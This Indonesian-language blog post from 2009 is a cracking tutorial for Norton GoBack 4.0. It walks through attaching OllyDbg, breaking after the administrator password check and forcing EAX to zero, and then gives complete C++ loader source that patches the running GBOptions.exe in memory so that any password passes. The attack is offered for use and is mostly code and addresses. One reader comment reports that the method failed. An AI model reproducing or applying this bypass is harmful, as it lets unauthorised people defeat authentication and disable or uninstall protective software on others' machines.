jump to navigation

Hack Norton GoBack November 28, 2009

Posted by geenz in Hacking Zone.
trackback

Norton GoBack memiliki mekanisme autentikasi untuk melindungi dirinya. Langkah – langkah berikut mengaktifkan mode “none” terhadap semua autentikasi yang terdapat dalam pengaturan Norton GoBack. Program yang harus Anda miliki yaitu OllyDbg yang dapat Anda download di bagian bawah.

  1. Langkah pertama jalankan OllyDbg, buka file GBOption.exe pada “%Program Files%\Norton GoBack”. File inilah yang digunakan Norton GoBack untuk mengubah settingannya.
  2. Selanjutnya tekan tombol F9. Jendela window baru dengan title “Norton GoBack Options” akan muncul. Pilih tab ke-2, click “Change  Level…”. Lalu akan muncul jendela window yang memberikan perubahan pada setiap action yaitu; enable/disable, uninstall, autobackup… Terdapat 3 level pengguna: ADMIN, USER dan NONE. Secara default, level untuk meng-uninstall adalah pengguna ADMIN, itu artinya Anda harus memiliki password untuk meng-uninstallnya. Setelah mengubah level ini menjadi NONE dan meng-click OK, program membutuhkan password ADMIN untuk proses autentikasi (jika Anda men-set password sebelumnya). Tapi disini kita tidak begitu membutuhkannya (lupakan password tersebut…..), dan kita akan melewati bagian ini.
  3. Kembali lagi ke OllyDbg, cari alamat 0x0043697D dengan menekan tombol Ctrl+G, enter address tersebut kemudian klik OK. OllyDbg akan mengubah alamat tersebut menjadi seperti dibawah ini:
    00436970 > 8B0D A8964700 MOV ECX,DWORD PTR DS:[4796A8]
    00436976 . 50 PUSH EAX
    00436977 . 51 PUSH ECX
    00436978 . E8 93E9FFFF CALL GBOption.00435310
    0043697D . 83C4 08 ADD ESP,8
    00436980 . 85C0 TEST EAX,EAX ; eax == 0 if pwd is correct!
    00436982 . 0F954424 0F SETNE BYTE PTR SS:[ESP+F]
    Lihat di alamat (address) 0x00436978, inilah fungsi yang digunakan GoBack untuk memeriksa password administrator. Alamat tersebut akan bernila TRUE jika password yang dimasukkan benar, dan bernilai FALSE jika salah. Namun, karena kita tidak memiliki password tersebut, tentu saja fungsi ini akan kita kembalikan ke nilai FALSE. Jadi kita akan mengeset alamat 0x0043697D untuk mengembalikan nilainya. Pastikan pointer berada di alamat 0x0043697D, tekan F2 untuk mengesetnya (baris tersebut akan berwarna merah).
  4. Masukkan password apapun sesuka hati dan ketika kembali ke Norton GoBack Options, klik OK, akan muncul kotak dialog untuk memasukkan password admin, masukkan kata apapun dan tekan OK. Sekarang, kontrol kembali ke OllyDgb, dan akan menjalankan alamat yang kita set lalu fungsi pause pun akan aktif. Lihat di register window di OllyDbg, kita akan melihat EAX = 0x00000090. Double klik alamat tersebut, rubah ke angka EAX menjadi 0x00000000 dan tekan F9 untuk melanjutkan. Sekarang kita akan melihat bahwa tidak ada warning message yang muncul. Semua setting yang kita rubah akan disimpan. Kita bisa memeriksanya kembali dengan meng-klik “Change Level…” untuk melihat hasilnya.
  5. Sekarang langkah terakhir. Setelah mengubah semua action level menjadi NONE, kita dapat melakukan apapun dengan Norton GoBack tanpa harus memasukkan password admin. Kita bisa mengaktifkan atau me-nonaktifkan (enable/disable), uninstall, dll.
    Automatic loader:
    /*
    * DESCRIPTION:
    * This loader is used in bypassing admin password
    * of Norton GoBack 4.0
    *
    * TODO:
    * Patch in memory at @0x436980
    * Origin: 0x85,0xC0,0x0F,0x95,0x44,0x24,0x0F
    * Patch: 0x33,0xC0,0xC6,0x44,0x24,0x0F,0x00
    */// Goback Loader.cpp
    #include <windows.h>

    LPTSTR strExecFile = TEXT(“GBOptions.exe”);

    int APIENTRY WinMain(HINSTANCE hInstance,
    HINSTANCE hPrevInstance,
    LPTSTR lpCmdLine,
    int nCmdShow)
    {
    HANDLE hFile;
    STARTUPINFO si;
    PROCESS_INFORMATION pi;
    ZeroMemory(&si, sizeof(si));
    ZeroMemory(&pi, sizeof(pi));

    //Find GBOptions.exe
    if( (hFile = CreateFile(strExecFile, 0, FILE_SHARE_READ, NULL,
    OPEN_EXISTING,
    FILE_ATTRIBUTE_NORMAL, NULL) ) == INVALID_HANDLE_VALUE)
    {
    MessageBox(0, “GBOptions.exe does not exist”, “Bypass Norton GoBack
    4.0”, MB_ICONERROR);
    return -1;
    }
    CloseHandle(hFile);

    //createprocess with suspend
    if( CreateProcess(NULL, strExecFile, NULL, NULL, FALSE,
    CREATE_SUSPENDED, NULL, NULL, &si, &pi) == FALSE)
    {
    MessageBox(0, “Error executing GBOptions.exe”, “Bypass Norton GoBack
    4.0”, MB_ICONERROR);
    return -1;
    }
    //patching
    BYTE buf[10];
    DWORD bytesRead, bytesWritten;
    ReadProcessMemory(pi.hProcess, (LPVOID)0x436980, buf, 7, &bytesRead);

    //Compare origin bytes
    if( buf[0] == 0x85 && buf[1] == 0xC0 && buf[2] == 0x0F && buf[3] == 0x95
    &&
    buf[4] == 0x44 && buf[5] == 0x24 && buf[6] == 0x0F )
    {
    //Correct!
    BYTE newData[] = {0x33, 0xC0, 0xC6, 0x44, 0x24, 0x0F, 0x00};
    WriteProcessMemory(pi.hProcess, (LPVOID)0x436980, newData,
    sizeof(newData) /sizeof(newData[0]), &bytesWritten);

    //resume
    ResumeThread(pi.hThread);
    CloseHandle(pi.hProcess);
    CloseHandle(pi.hThread);
    MessageBox(0, “Bypass succesfully!”, “Bypass Norton GoBack 4.0”, MB_ICONINFORMATION);
    }
    else
    {
    //Failed
    MessageBox(0, “Wrong size???\nWrong version!”, “Bypass Norton GoBack
    4.0”, MB_ICONERROR);
    TerminateProcess(pi.hProcess, 0);
    CloseHandle(pi.hProcess);
    CloseHandle(pi.hThread);
    }
    return 0;
    }

Download OllyDbg

Credit to securityvulns

Komentar»

1. Andri - April 17, 2010

Ga bisa tuh cara nya bos, GATOT


Tinggalkan Balasan

Isikan data di bawah atau klik salah satu ikon untuk log in:

Logo WordPress.com

You are commenting using your WordPress.com account. Logout / Ubah )

Gambar Twitter

You are commenting using your Twitter account. Logout / Ubah )

Foto Facebook

You are commenting using your Facebook account. Logout / Ubah )

Foto Google+

You are commenting using your Google+ account. Logout / Ubah )

Connecting to %s

%d blogger menyukai ini: